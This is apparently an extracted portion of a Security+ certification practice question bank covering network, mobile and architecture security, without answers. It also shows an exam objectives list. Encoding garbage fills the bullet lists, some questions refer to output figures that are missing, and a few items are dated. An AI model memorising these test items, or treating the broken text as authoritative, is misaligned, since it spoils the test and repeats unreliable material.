1879C. Repeater
1880D. Full
188180. Lilly is a network administrator for a medium-sized financial services company. She wants
1882to implement company-wide encryption and digital signing of emails. But she is concerned
1883about cost, since there is a very limited budget for this. What would be her best choice?
1884A. SMTPS
1885B. S/MIME
1886C. IMAPS
1887D. PGP
188881. Edward is a security manager for a bank. He has recently been reading a great deal
1889about malware that accesses system memory. He wants to find a solution that would
1890stop programs from utilizing system memory. Which of the following would be the
1891best solution?
1892A. DEP
1893B. FDE
1894C. UTM
1895D. IDS
189682. Sarah is the CIO for a small company. She recently had the entire company’s voice calls
1897moved to VoIP. Her new VoIP system is using SIP with RTP. What might be the concern
1898with this?
1899A. SIP is not secure.
1900B. RTP is not secure.
1901C. RTP is too slow.
1902D. SIP is too slow.
190383. What command would generate the output shown here?
1904A. nslookup
1905B. ipconfig
1906C. netstat -a
1907D. dig
190884. Emiliano is a network administrator for a large web-hosting company. His company also
1909issues digital certificates to web-hosting clients. He wants to ensure that a digital certifi-
1910cate will not be used once it has been revoked. He also wants to ensure that there will be
1911no delay between when the certificate is revoked and when browsers are made aware that
1912it is revoked. What solution would be best for this?
1913A. OCSP
1914B. X.509
1915C. CRL
1916D. PKI
191785. Elizabeth is responsible for security at a defense contracting company. She is concerned
1918about users within her network exfiltrating data by attaching sensitive documents to
1919emails. What solution would best address this concern?
1920A. Email encryption
1921B. USB blocking
1922C. NIPS
1923D. Content filtering
192486. Victor is concerned about data security on BYOD and COPE. He is concerned specifi-
1925cally about data exposure should the device become lost or stolen. Which of the following
1926would be most effective in countering this concern?
1927A. Geofencing
1928B. Screen lock
1929C. GPS tagging
1930D. Device encryption
193187. Gabriel is using nmap to scan one of his servers whose IP address is 192.168.1.1. He wants
1932to perform a ping scan, but the network blocks ICMP, so he will try a TCP ping scan and
1933do so very slowly. Which of the following would accomplish that?
1934A. nmap -O -PT -T1 192.168.1.1
1935B. nmap -O – T3 192.168.1.1
1936C. nmap -T -T1 192.168.1.1
1937D. nmap -PT -T5 192.168.1.1
193888. Mary is a network administrator for ACME Company. She sometimes needs to run a
1939packet sniffer so that she can view the network traffic. She wants to find a well-known
1940packet sniffer that works on Linux. Which of the following would be her best choice?
1941A. Ophcrack
1942B. Nmap
1943C. Wireshark
1944D. Tcpdump
194589. What command produced the output shown here?
1946A. tracert -h 10 www.chuckeasttom.com
1947B. tracert www.chuckeasttom.com
1948C. netstat www.chuckeasttom.com
1949D. nmap www.chuckeasttom.com
195090. Daryll has been using a packet sniffer to observe traffic on his company’s network. He has
1951noticed that traffic between the web server and the database server is sent in clear text.
1952He wants a solution that will not only encrypt that traffic, but also leverage the existing
1953digital certificate infrastructure his company has. Which of the following would be the
1954best solution for Daryll?
1955A. TLS
1956B. SSL
1957C. IPSec
1958D. WPA2
195991. Jarod is concerned about DLP in his organization. Employees all have cloud-based solu-
1960tions for data storage. What DLP-related security hazard, if any, might this create?
1961A. No security hazard
1962B. Malware from the cloud
1963C. Data exfiltration through the cloud
1964D. Security policies don’t apply to the cloud.
196592. Derrick is a network administrator for a large company. The company network is seg-
1966mented into zones of high security, medium security, low security, and the DMZ. He is
1967concerned about external intruders and wishes to install a honeypot. Which is the most
1968important zone to put the honeypot in?
1969A. High security
1970B. Medium security
1971C. Low security
1972D. DMZ
197393. Sheila is responsible for data backups for all the company servers. She is concerned about
1974frequency of backup and about security of the backup data. Which feature, found in some
1975backup utility software, would be most important to her?
1976A. Using data encryption
1977B. Digitally signing the data
1978C. Using automated backup scheduling
1979D. Hashing the backup data
198094. Frank is a web server administrator for a large e-commerce company. He is concerned
1981about someone using netcat to connect to the company web server and retrieving detailed
1982information about the server. What best describes his concern?
1983A. Passive reconnaissance
1984B. Active reconnaissance
1985C. Banner grabbing
1986D. Vulnerability scanning
198795. Mike is responsible for testing security at his company. He is using a tool that identifies
1988vulnerabilities and provides mechanisms to test them by attempting to exploit them. What
1989best describes this type of tool?
1990A. Vulnerability scanner
1991B. Exploit framework
1992C. Metasploit
1993D. Nessus
199496. William is a security officer for a large bank. When executives’ laptops are decommis-
1995sioned, he wants to ensure that the data on those laptops is completely wiped so that it
1996cannot be recovered, even using forensic tools. How many times should William wipe a
1997hard drive?
1998A. 1
1999B. 3
2000C. 5
2001D. 7
200297. You are responsible for firewalls in your organization. You are concerned about ensuring
2003that all firewalls are properly configured. The gateway firewall is configured as follows:
2004to only allow inbound traffic on a very few specific, required ports; all traffic (allowed
2005or blocked) is logged and logs forwarded to the SIEM. What, if anything, is missing from
2006this configuration?
2007A. Nothing, it is a good configuration.
2008B. Encrypting all traffic
2009C. Outbound connection rules
2010D. Digital certificate authentication for inbound traffic
201198. Charles is responsible for security for web servers in his company. Some web servers are
2012used for an internal intranet, and some for external websites. He has chosen to encrypt
2013all web traffic, and he is using self-signed X.509 certificates. What, if anything, is wrong
2014with this approach?
2015A. He cannot encrypt all HTTP traffic.
2016B. He should use PGP certificates.
2017C. He should not use self-signed certificates.
2018D. Nothing; this is an appropriate configuration.
201999. You are responsible for the security of web servers at your company. You are configuring
2020the WAF and want to allow only encrypted traffic to and from the web server, including
2021traffic from administrators using a command-line interface. What should you do?
2022A. Open port 80 and 23, and block port 443.
2023B. Open port 443 and 23, and block port 80.
2024C. Open port 443 and 22, and block port 80 and 23.
2025D. Open port 443, and block all other ports.
2026100. Francis is a security administrator at a large law firm. She is concerned that confidential
2027documents, with proprietary information, might be leaked. The leaks could be intentional
2028or accidental. She is looking for a solution that would embed some identifying informa-
2029tion into documents in such a way that it would not be seen by the reader but could be
2030extracted with the right software. What technology would best meet Francis’s needs?
2031A. Symmetric encryption
2032B. Steganography
2033C. Hashing
2034D. Asymmetric encryption
2035101. You are responsible for the gateway firewall for your company. You need to configure a
2036firewall to allow only email that is encrypted to be sent or received. What action should
2037you take?
2038A. Allow ports 25, 110, and 143. Block ports 465, 993, and 995.
2039B. Block ports 25, 110, and 143. Allow ports 465, 993, and 995.
2040C. Allow ports 25, 110, and 443. Block ports 465, 993, and 143.
2041D. Block ports 465, 994, and 464. Allow ports 25, 110, and 80.
2042102. Mark is responsible for security for a small bank. He has a firewall at the gateway as well
2043as one at each network segment. Each firewall logs all accepted and rejected traffic. Mark
2044checks each of these logs regularly. What is the first step Mark should take to improve his
2045firewall configuration?
2046A. Integrate with SIEM.
2047B. Add a honeypot.
2048C. Integrate with AD.
2049D. Add a honeynet.
2050103. You are setting up VPNs in your company. You are concerned that anyone running a
2051packet sniffer could obtain metadata about the traffic. You have chosen IPSec. What
2052mode should you use to accomplish your goals of preventing metadata being seen?
2053A. AH
2054B. ESP
2055C. Tunneling
2056D. Transport
2057104. John is responsible for configuring security devices in his network. He has implemented a
2058robust NIDS in his network. However, on two occasions the NIDS has missed a breach.
2059What configuration issue should John address?
2060A. False negative
2061B. Port blocking
2062C. SPI
2063D. False positive
2064105. You are responsible for communications security at your company. Your company has a
2065large number of remote workers, including traveling salespeople. You wish to make sure that
2066when they connect to the network, it is in a secure manner. What should you implement?
2067A. L2TP VPN
2068B. IPSec VPN
2069C. Site-to-site VPN
2070D. Remote-access VPN
2071106. Your company is issuing portable devices to employees for them to use for both work and
2072personal use. This is done so the company can control the security of the devices. What, if
2073anything, is an issue this process will cause?
2074A. Personal information being exposed
2075B. Company data being exfiltrated
2076C. Devices being insecurely configured
2077D. No issues
2078107. Marsha is responsible for mobile device security. Her company uses COPE for mobile
2079devices. All phones and tablets have a screen lock and GPS tagging. What is the next,
2080most important step for Marsha to take to secure the phones?
2081A. Implement geofencing.
2082B. Implement application management.
2083C. Implement geolocation.
2084D. Implement remote wipe.
2085108. Valerie is responsible for mobile device security at her company. The company is using
2086BYOD. She is concerned about employees’ personal device usage compromising company
2087data on the phones. What technology would best address this concern?
2088A. Containerization
2089B. Screen lock
2090C. Full disk encryption
2091D. Biometrics
2092109. Jack is a chief information security officer (CISO) for a small marketing company. The
2093company’s sales staff travel extensively and all use mobile devices. He has recently become
2094concerned about sideloading. Which of the following best describes sideloading?
2095A. Installing applications to Android devices via USB
2096B. Loading software on any device via WiFi
2097C. Bypassing the screen lock
2098D. Loading malware on a device without the user being aware
2099110. You are responsible for DLP at a large company. Some employees have COPE and others
2100BYOD. What DLP issue might these devices present?
2101A. COPE can be USB OTG.
2102B. BYOD can be USB OTG.
2103C. COPE and BYOD can be USB OTG.
2104D. Only jailbroken COPE or BYOD can be USB OTG.
2105111. John is responsible for network security at a large company. He is concerned about a
2106variety of attacks but DNS poisoning in particular. Which of the following protocols
2107would provide the most help in mitigating this issue?
2108A. IPSec
2109B. DNSSEC
2110C. L2TP
2111D. TLS
2112112. You are responsible for network security at your company. You have discovered that NTP
2113is not functioning properly. What security protocol will most likely be affected by this?
2114A. Radius
2115B. DNSSEC
2116C. IPSec
2117D. Kerberos
2118113. Frank is concerned about DHCP starvation attacks. He is even more worried since he
2119learned that anyone can download software called a “gobbler†and execute a DHCP
2120starvation attack. What technology would most help him mitigate this risk?
2121A. Encrypt all DHCP communication with TLS.
2122B. FDE on the DHCP server
2123C. Network Address Allocation
2124D. IPSec for all DHCP communications
2125114. You are trying to allocate appropriate numbers of IP addresses for various subnets in your
2126network. What would be the proper CIDR notation for an IP v4 subnet with 59 nodes?
2127A. /27
2128B. /29
2129C. /24
2130D. /26
2131115. Lydia is trying to reduce costs at her company and at the same time centralize network
2132administration and maintain direct control of the network. Which of the following solu-
2133tions would provide the most network administration centralization and control while
2134reducing costs?
2135A. Outsourcing network administration
2136B. IaaS
2137C. PaaS
2138D. Moving all OSs to open source
2139116. You are investigating a remote access protocol for your company to use. The protocol
2140needs to fully encrypt the message, use reliable transport protocols, and support a range
2141of network protocols. Which of the following would be the best choice?
2142A. RADIUS
2143B. Diameter
2144C. TACACS +
2145D. IPSec
2146117. Carrol is responsible for network connectivity in her company. The sales department is
2147transitioning to VoIP. What are two protocols she must allow through the firewall?
2148A. RADIUS and SNMP
2149B. TCP and UDP
2150C. SIP and RTP
2151D. RADIUS and SIP
2152118. John is setting up all the database servers on their own subnet. He has placed them on
215310.10.3.3/29. How many nodes can be allocated in this subnet?
2154A. 32
2155B. 16
2156C. 8
2157D. 6
2158119. Carlos is a security manager for a small company that does medical billing and records
2159management. He is using application blacklisting to prevent malicious applications from
2160being installed. What, if anything, is the weakness with this approach?
2161A. None, this is the right approach.
2162B. It might block legitimate applications.Chapter 2
2163C. It might fail to block malicious applications.
2164D. It will limit productivity.
2165120. Joanne is a security administrator for a large company. She discovered that approximately
2166100 machines on her network were recently attacked by a major virus. She is concerned
2167because there was a patch available that would have stopped the virus from having any
2168impact. What is the best solution for her to implement on her network?
2169A. Installing patch management software
2170B. Using automatic updates
2171C. Putting unpatched machines on a Bridge
2172D. Scanning all machines for patches every day
2173121. A review of your company’s network traffic shows that most of the malware infections are
2174caused by users visiting illicit websites. You want to implement a solution that will block
2175these websites, scan all web traffic for signs of malware, and block the malware before it
2176enters the company network. Which of the following technologies would be the best
2177solution?
2178A. IDS
2179B. Firewall
2180C. UTM
2181D. SIEM
2182122. You work for a large bank. The bank is trying to limit the risk associated with the use of
2183unapproved USB devices to copy documents. Which of the following would be the best
2184solution to this problem?
2185A. IDS
2186B. DLP
2187C. Content filtering
2188D. NIPS
2189123. Match the letter of the functionality with the device in the following table.
2190A. Detect intrusions on a single machine
2191B. Use aggregate logs
2192C. Filter network packets based on a set of rules
2193D. Detect intrusions on a network segment
2194Firewall
2195HIDS
2196SIEM
2197NIDS
2198124. Francine is concerned about employees in her company jailbreaking their COPE devices.
2199What would be the most critical security concern for jailbroken devices?
2200A. They would no longer get security patches.
2201B. It would disable FDE.
2202C. Unauthorized applications could be installed.
2203D. Data could be exfiltrated on these devices.
2204125. You are responsible for mobile device security in your company. Employees have COPE
2205devices. Many employees only enter the office infrequently, and you are concerned that
2206their devices are not receiving firmware updates on time. What is the best solution for this
2207problem?
2208A. Scheduled office visits for updates
2209B. OTA updates
2210C. Moving from COPE to BYOD
2211D. A policy that requires users to update their firmware regularly
2212126. Frank is looking for a remote authentication and access protocol. It must be one that uses
2213UDP due to firewall rules. Which of the following would be the best choice?
2214A. RADIUS
2215B. Diameter
2216C. TACACS +
2217D. IPSec
2218127. You have discovered that one of the employees at your company tethers her smartphone
2219to her work PC to bypass the corporate web security and access prohibited websites while
2220connected to the LAN. What would be the best way to prevent this?
2221A. Disable wireless access.
2222B. Implement a WAF.
2223C. Implement a policy against tethering.
2224D. Implement an HIPS.
2225128. You work for a large bank. One of your responsibilities is to ensure that web banking
2226logins are as secure as possible. You are concerned that a customer’s account login could
2227be compromised and someone else would use that login to access the customer’s account.
2228What is the best way to mitigate this threat?
2229A. Use SMS authentication for any logins from an unknown location or computer.
2230B. Encrypt all traffic via TLS.
2231C. Require strong passwords.
2232D. Do not allow customers to log on from any place other than their home computer.
2233129. You have discovered that some employees in your company have installed custom firm-
2234ware on their portable devices. What security flaw would this most likely lead to?
2235A. Unauthorized software can run on the device.
2236B. The device may not connect to the network.
2237C. The device will overheat.
2238D. This is not really a security issue.
2239130. You are configuring BYOD access for your company. You want the absolute most robust
2240security for the BYOD on your network. What would be the best solution?
2241A. Agentless NAC
2242B. Agent NAC
2243C. Digital certificate authentication
2244D. Two-factor authentication
2245131. You work for a large law firm and are responsible for network security. It is common for
2246guests to come to the law firm (clients, expert witnesses, etc.) who need to connect to the
2247firm’s WiFi. You wish to ensure that you provide the maximum security when these guests
2248connect with their own devices, but you also wish to provide assurance to the guest that
2249you will have minimal impact on their device. What is the best solution?
2250A. Permanent NAC agent
2251B. Agentless NAC
2252C. Dissolvable NAC agent
2253D. Implement COPE
2254132. Tom is concerned about how his company can best respond to breaches. He is interested
2255in finding a way to identify files that have been changed during the breach. What would
2256be the best solution for him to implement?
2257A. NAC
2258B. NIDS
2259C. File integrity checker
2260D. Vulnerability scanner
2261133. Mary works for a large insurance company and is responsible for cybersecurity. She is
2262concerned about insiders and wants to detect malicious activity on the part of insiders.
2263But she wants her detection process to be invisible to the attacker. What technology best
2264fits these needs?
2265A. Hybrid NIDS
2266B. Out-of-band NIDS
2267C. NIPS
2268D. NNIDS
2269134. Denish is responsible for security at a large financial services company. The company
2270frequently uses SSL/TLS for connecting to external resources. He has concerns that an
2271insider might exfiltrate data using an SSL/TLS tunnel. What would be the best solution to
2272this issue?
2273A. NIPS
2274B. SSL decryptor
2275C. NIDS
2276D. SSL accelerator
2277135. You want to allow a media gateway to be accessible through your firewall. What ports
2278should you open? (Choose two.)
2279A. 2427
2280B. 1707
2281C. 2227
2282D. 1727
2283136. Match the letter with the protocol in the following table.
2284A. Wireless security
2285B. Voice over IP
2286C. VPN
2287D. Secure command-line interface
2288IPSec
2289WPA2
2290SSH
2291SIP
2292137. Dennis is implementing wireless security throughout his network. He is using WPA2.
2293However, there are some older machines that cannot connect to WPA2—they only
2294support WEP. At least for now, he must keep these machines. What is the best solution
2295for this problem?
2296A. Put those machines on a different VLAN.
2297B. Deny wireless capability for those machines.
2298C. Put those machines on a separate wireless network with separate WAP.
2299D. Encrypt their traffic with TLS.
2300138. You are a security administrator for Acme Company. Employees in your company
2301routinely upload and download files. You are looking for a method that allows users to
2302remotely upload or download files in a secure manner. The solution must also support
2303more advanced file operations such as creating directories, deleting files, and so forth.
2304What is the best solution for this?
2305A. SFTP
2306B. SSH
2307C. SCP
2308D. IPSec
2309
2310139. Your company allows BYOD on the network. You are concerned about the risk of malicious
2311apps being introduced to your network. Which of the following policies would be most help-
2312ful in mitigating that risk?
2313A. Prohibiting apps from third-party stores
2314B. Application blacklisting
2315C. Antimalware scanning
2316D. Requiring FDE on BYOD
2317140. John is the CISO for a small company. The company has password policies, but John is
2318not sure the policies are adequate. He is concerned that someone might be able to “crackâ€
2319company passwords. What is the best way for John to determine whether his passwords
2320are vulnerable?
2321A. Run a good vulnerability scan.
2322B. Perform a password policy audit.
2323C. Use one or more password crackers himself.
2324D. Ensure that passwords are stored as a hash.
2325141. You are scanning your network using a packet sniffer. You are seeing traffic on ports
232625 and 110. What security flaw would you most likely notice on these ports?
2327A. Website vulnerabilities
2328B. Unencrypted credentials
2329C. Misconfigured FTP
2330D. Digital certificate errors
2331142. Abigail is a network administrator with ACME Company. She believes that a network
2332breach has occurred in the data center as a result of a misconfigured router access list,
2333allowing outside access to an SSH server. Which of the following should she search for
2334in the logs to confirm if such a breach occurred?
2335A. Traffic on port 23
2336B. Traffic on port 22
2337C. Unencrypted credentials
2338D. Malformed network packets
2339143. Gianna is evaluating the security of her company. The company has a number of mobile
2340apps that were developed in house for use on COPE devices. She wants to ensure that
2341these apps are updated as soon as an update is available. What should she ensure is being
2342used?
2343A. Firmware OTA
2344B. Push notifications
2345C. Scheduled updates
2346D. A policy against custom firmware
2347
2348144. Liam is concerned about the security of both COPE and BYOD devices. His company uses
2349a lot of Android-based devices, and he is concerned about users getting administrative
2350access and altering security features. What should he prohibit in his company?
2351A. Third-party app stores
2352B. Jailbreaking
2353C. Custom firmware
2354D. Rooting
2355145. Heidi works for a large company that issues various mobile devices (tablets and phones)
2356to employees. She is concerned about unauthorized access to mobile devices. Which of the
2357following would be the best way to mitigate that concern?
2358A. Biometrics
2359B. Screen lock
2360C. Context-aware authentication
2361D. Storage segmentation
2362146. You are looking for a point-to-point connection method that would allow two devices to
2363synchronize data. The solution you pick should not be affected by EMI (electromagnetic
2364interference) and should be usable over distances exceeding 10 meters, provided there is a
2365line-of-sight connection. What would be the best solution?
2366A. Bluetooth
2367B. WiFi
2368C. Infrared
2369D. RF
2370147. You wish to use nmap to scan one of your servers, whose IP address is 192.168.1.16. The
2371target is one of your own Windows servers. You want a scan that is the most thorough,
2372and you are not concerned about it being detected. Which of the following would best
2373accomplish that?
2374A. nmap -sW -sL -T1 192.168.1.16/24
2375B. nmap -sW -sT -T1 192.168.1.16
2376C. nmap -sW -sT -T5 192.168.1.16/24
2377D. nmap -sW -sT -sO -T5 192.168.1.16
2378148. What command would produce the output shown here?
2379A. nestat -a
2380B. arp -a
2381C. arp -s
2382D. netstat -s
2383149. Ethan has noticed some users on his network accessing inappropriate videos. His network
2384uses a proxy server that has content filtering with blacklisting. What is the most likely
2385cause of this issue?
2386A. Sites not on the blacklist
2387B. Misconfigured content filtering
2388C. Misconfigured proxy server
2389D. Someone circumventing the proxy server
2390150. You are looking for tools to assist in penetration testing your network. Which of the
2391following best describes Metasploit?
2392A. Hacking tool
2393B. Vulnerability scanner
2394C. Exploit framework
2395D. Network scanner
2396151. Logan is responsible for enforcing security policies in his company. There are a number of
2397policies regarding the proper configuration of public-facing servers. Which of the follow-
2398ing would be the best way for Logan to check to see if such policies are being enforced?
2399A. Periodically audit selected servers.
2400B. Implement a configuration compliance scanning solution.
2401C. Conduct routine penetration tests of those servers.
2402D. Implement a vulnerability scanning solution.
2403
2404
2405++++++
2406+++++
2407
2408Architecture and
2409Design
2410The CompTIA Security+ Exam
2411SY0-501 topics covered in this
2412chapter include the following:
2413✓ ✓ 3.1 Explain use cases and purpose for frameworks, best
2414practices and secure configuration guides.
2415â– â–
2416â– â–
2417Industry-standard frameworks and reference architectures
2418â– â– Regulatory
2419â– â– Non-regulatory
2420â– â– National vs. international
2421â– â– Industry-specific frameworks
2422Benchmarks/secure configuration guides
2423â– â–
2424â– â–
2425â– â–
2426Platform/vendor-specific guides
2427â– â– Web server
2428â– â– Operating system
2429â– â– Application server
2430â– â– Network infrastructure devices
2431General purpose guides
2432Defense-in-depth/layered security
2433â– â– Vendor diversity
2434â– â– Control diversity
2435â– â–
2436â– â– Administrative
2437â– â– Technical
2438User training
2439✓ ✓ 3.2 Given a scenario, implement secure network
2440architecture concepts.
2441â– â–
2442Zones/topologies
2443â– â–
2444DMZâ– â–
2445â– â–
2446â– â–
2447â– â–
2448â– â– Extranet
2449â– â– Intranet
2450â– â– Wireless
2451â– â– Guest
2452â– â– Honeynets
2453â– â– NAT
2454â– â– Ad hoc
2455Segregation/segmentation/isolation
2456â– â– Physical
2457â– â– Logical (VLAN)
2458â– â– Virtualization
2459â– â– Air gaps
2460Tunneling/VPN
2461â– â– Site-to-site
2462â– â– Remote access
2463Security device/technology placement
2464â– â– Sensors
2465â– â– Collectors
2466â– â– Correlation engines
2467â– â– Filters
2468â– â– Proxies
2469â– â– Firewalls
2470â– â– VPN concentrators
2471â– â– SSL accelerators
2472â– â– Load balancers
2473â– â– DDoS mitigator
2474â– â– Aggregation switches
2475â– â– Taps and port mirror
2476SDN✓ ✓ 3.3 Given a scenario, implement secure systems design.
2477â– â–
2478â– â–
2479Hardware/firmware security
2480â– â– FDE/SED
2481â– â– TPM
2482â– â– HSM
2483â– â– UEFI/BIOS
2484â– â– Secure boot and attestation
2485â– â– Supply chain
2486â– â– Hardware root of trust
2487â– â– EMI/EMP
2488Operating systems
2489â– â–
2490â– â–
2491Types
2492â– â– Network
2493â– â– Server
2494â– â– Workstation
2495â– â– Appliance
2496â– â– Kiosk
2497â– â– Mobile OS
2498â– â– Patch management
2499â– â– Disabling unnecessary ports and services
2500â– â– Least functionality
2501â– â– Secure configurations
2502â– â– Trusted operating system
2503â– â– Application whitelisting/blacklisting
2504â– â– Disable default accounts/passwords
2505Peripherals
2506â– â– Wireless keyboards
2507â– â– Wireless mice
2508â– â– Displays
2509â– â– WiFi-enabled MicroSD cards
2510â– â– Printers/MFDs
2511â– â– External storage devices
2512■■Digital cameras✓ ✓ 3.4 Explain the importance of secure staging
2513deployment concepts.
2514â– â– Sandboxing
2515â– â– Environment
2516â– â– Development
2517â– â– Test
2518â– â– Staging
2519â– â– Production
2520â– â– Secure baseline
2521â– â– Integrity measurement
2522✓ ✓ 3.5 Explain the security implications of embedded
2523systems.
2524â– â– SCADA/ICS
2525â– â– Smart devices/IoT
2526â– â– Wearable technology
2527â– â– Home automation
2528â– â– HVAC
2529â– â– SoC
2530â– â– RTOS
2531â– â– Printers/MFDs
2532â– â– Camera systems
2533â– â– Special purpose
2534â– â– Medical devices
2535â– â– Vehicles
2536â– â– Aircraft/UAV
2537✓ ✓ 3.6 Summarize secure application development and
2538deployment concepts.
2539â– â–
2540Development life-cycle models
2541â– â–
2542â– â–
2543Waterfall vs. Agile
2544Secure DevOps
2545â– â– Security automation
2546â– â– Continuous integrationâ– â– Baselining
2547â– â– Immutable systems
2548â– â– Infrastructure as code
2549â– â– Version control and change management
2550â– â– Provisioning and deprovisioning
2551â– â– Secure coding techniques
2552â– â–
2553â– â–
2554✓ ✓ 3.7
2555â– â–
2556â– â– Proper error handling
2557â– â– Proper input validation
2558â– â– Normalization
2559â– â– Stored procedures
2560â– â– Code signing
2561â– â– Encryption
2562â– â– Obfuscation/camouflage
2563â– â– Code reuse/dead code
2564â– â– Server-side vs. client-side execution and validation
2565â– â– Memory management
2566â– â– Use of third-party libraries and SDKs
2567â– â– Data exposure
2568Code quality and testing
2569â– â– Static code analyzers
2570â– â– Dynamic analysis (e.g., fuzzing)
2571â– â– Stress testing
2572â– â– Model verification
2573Compiled vs. runtime code
2574Summarize cloud and virtualization concepts.
2575Hypervisor
2576â– â– Type I
2577â– â– Type II
2578â– â– Application cells/containers
2579â– â– VM sprawl avoidance
2580â– â– VM escape protection
2581â– â– Cloud storageâ– â–
2582Cloud deployment models
2583â– â– SaaS
2584â– â– PaaS
2585â– â– IaaS
2586â– â– Private
2587â– â– Public
2588â– â– Hybrid
2589â– â– Community
2590â– â– On-premise vs. hosted vs. cloud
2591â– â– VDI/VDE
2592â– â– Cloud access security broker
2593â– â– Security as a Service
2594✓ ✓ 3.8 Explain how resiliency and automation strategies
2595reduce risk.
2596â– â–
2597Automation/scripting
2598â– â– Automated courses of action
2599â– â– Continuous monitoring
2600â– â– Configuration validation
2601â– â– Templates
2602â– â– Master image
2603â– â– Non-persistence
2604â– â– Snapshots
2605â– â– Revert to known state
2606â– â– Rollback to known configuration
2607â– â– Live boot media
2608â– â– Elasticity
2609â– â– Scalability
2610â– â– Distributive allocation
2611â– â– Redundancy
2612â– â– Fault tolerance
2613â– â– High availability
2614■■RAID✓ ✓ 3.9
2615Explain the importance of physical security controls.
2616â– â– Lighting
2617â– â– Signs
2618â– â– Fencing/gate/cage
2619â– â– Security guards
2620â– â– Alarms
2621â– â– Safe
2622â– â– Secure cabinets/enclosures
2623â– â– Protected distribution/Protected cabling
2624â– â– Airgap
2625â– â– Mantrap
2626â– â– Faraday cage
2627â– â– Lock types
2628â– â– Biometrics
2629â– â– Barricades/bollards
2630â– â– Tokens/cards
2631â– â– Environmental controls
2632â– â– HVAC
2633â– â– Hot and cold aisles
2634â– â– Fire suppression
2635â– â– Cable locks
2636â– â– Screen filters
2637â– â– Cameras
2638â– â– Motion detection
2639â– â– Logs
2640â– â– Infrared detection
2641â– â– Key management
2642â–
2643Architecture and Design
26441. Caroline has been asked to find a standard to guide her company’s choices in
2645implementing information security management systems. She is looking for a standard
2646that is international. Which of the following would be the best choice for her?
2647A. ISO 27002
2648B. ISO 27017
2649C. NIST 800-12
2650D. NIST 800-14
26512. You are responsible for network security at an e-commerce company. You want to ensure
2652that you are using best practices for the e-commerce website your company hosts. What
2653standard would be the best for you to review?
2654A. OWASP
2655B. NERC
2656C. NIST
2657D. ISA/IEC
26583. Cheryl is responsible for cybersecurity at a mid-sized insurance company. She has decided
2659to utilize a different vendor for network antimalware than she uses for host antimalware.
2660Is this a recommended action, and why or why not?
2661A. This is not recommended; you should use a single vendor for a particular security
2662control.
2663B. This is recommended; this is described as vendor diversity.
2664C. This is not recommended; this is described as vendor forking.
2665D. It is neutral. This does not improve or detract from security.
26664. Maria is a security administrator for a large bank. She is concerned about malware, par-
2667ticularly spyware that could compromise customer data. Which of the following would be
2668the best approach for her to mitigate the threat of spyware?
2669A. Computer usage policies, network antimalware, and host antimalware
2670B. Host antimalware and network antimalware
2671C. Host and network antimalware, computer usage policies, and website whitelisting
2672D. Host and network antimalware, computer usage policies, and employee training
26735. Gabriel is setting up a new e-commerce server. He is concerned about security issues.
2674Which of the following would be the best location to place an e-commerce server?
2675A. DMZ
2676B. Intranet
2677C. Guest network
2678D. Extranet
26796. Enrique is concerned about backup data being infected by malware. The company backs
2680up key servers to digital storage on a backup server. Which of the following would be
2681most effective in preventing the backup data being infected by malware?
2682A. Place the backup server on a separate VLAN.
2683B. Air-gap the backup server.
2684C. Place the backup server on a different network segment.
2685D. Use a honeynet.
26867. Janelle is the security administrator for a small company. She is trying to improve security
2687throughout the network. Which of the following steps should she take first?
2688A. Implement antimalware on all computers.
2689B. Implement acceptable use policies.
2690C. Turn off unneeded services on all computers.
2691D. Turn on host-based firewalls on all computers.
26928. Mary is the CISO for a mid-sized company. She is attempting to mitigate the danger
2693of computer viruses. Which administrative control can she implement to help achieve
2694this goal?
2695A. Implement host-based antimalware.
2696B. Implement policies regarding email attachments and file downloads.
2697C. Implement network-based antimalware.
2698D. Block portable storage devices from being connected to computers.
26999. You are the network administrator for a large company. Your company frequently has
2700nonemployees in the company such as clients and vendors. You have been directed to
2701provide these nonemployees with access to the Internet. Which of the following is the best
2702way to implement this?
2703A. Establish a guest network.
2704B. Allow nonemployees to connect only to the DMZ.
2705C. Allow nonemployees to connect only to the intranet.
2706D. Establish limited accounts on your network for nonemployees to use.
270710. Juan is a network administrator for an insurance company. His company has a number
2708of traveling salespeople. He is concerned about confidential data on their laptops. What is
2709the best way for him to address this?
2710A. FDE
2711B. TPM
2712C. SDN
2713D. DMZ
271411. Terrance is responsible for secure communications on his company’s network. The
2715company has a number of traveling salespeople who need to connect to network
2716resources. What technology would be most helpful in addressing this need?
2717A. VPN concentrator
2718B. SSL accelerator
2719C. DMZ
2720D. Guest network
272112. Mohaned is concerned about malware infecting machines on his network. One of his
2722concerns is that malware would be able to access sensitive system functionality that
2723requires administrative access. What technique would best address this issue?
2724A. Implementing host-based antimalware
2725B. Using a nonadministrative account for normal activities
2726C. Implementing FDE
2727D. Making certain the operating systems are patched
272813. John works for an insurance company. His company uses a number of operating systems,
2729including Windows and Linux. In this mixed environment, what determines the network
2730operating system?
2731A. The OS of the DNS server
2732B. The OS of the domain controller
2733C. The OS of the majority of servers
2734D. The OS of the majority of client computers
273514. Juanita is implementing virtualized systems in her network. She is using Type I
2736hypervisors. What operating system should be on the machines for her to install
2737the hypervisor?
2738A. None
2739B. Windows
2740C. Any operating system
2741D. Windows or Linux
274215. You are responsible for security at your company. You want to improve cloud security by
2743following the guidelines of an established international standard. What standard would
2744be most helpful?
2745A. NIST 800-14
2746B. NIST 800-53
2747C. ISO 27017
2748D. ISO 27002
274916. You are responsible for setting up a kiosk computer that will be in your company’s lobby.
2750It will be accessible for visitors to locate employee offices, obtain the guest WiFi pass-
2751word, and retrieve general public company information. What is the most important thing
2752to consider when configuring this system?
2753A. Using a strong administrator password
2754B. Limiting functionality to only what is needed
2755C. Using good antivirus protection
2756D. Implementing a host-based firewall
275717. You are concerned about peripheral devices being exploited by an attacker. Which of the
2758following is the first step you should take to mitigate this threat?
2759A. Disable WiFi for any peripheral that does not absolutely need it.
2760B. Enable BIOS protection for peripheral devices.
2761C. Use strong encryption on all peripheral devices.
2762D. Configure antivirus on all peripherals.
276318. Which design concept limits access to systems from outside users while protecting users
2764and systems inside the LAN?
2765A. DMZ
2766B. VLAN
2767C. Router
2768D. Guest network
276919. Which of the following is the equivalent of a VLAN from a physical security perspective?
2770A. Perimeter security
2771B. Partitioning
2772C. Security zones
2773D. Firewall
277420. In an attempt to observe hacker techniques, a security administrator configures a
2775nonproduction network to be used as a target so that he can covertly monitor network
2776attacks. What is this type of network called?
2777A. Active detection
2778B. False subnet
2779C. IDS
2780D. Honeynet
278121. You have instructed all administrators to disable all nonessential ports on servers at their
2782sites. Why are nonessential protocols a security issue that you should be concerned about?
2783A. Nonessential ports provide additional areas of attack.
2784B. Nonessential ports can’t be secured.
2785C. Nonessential ports are less secure.
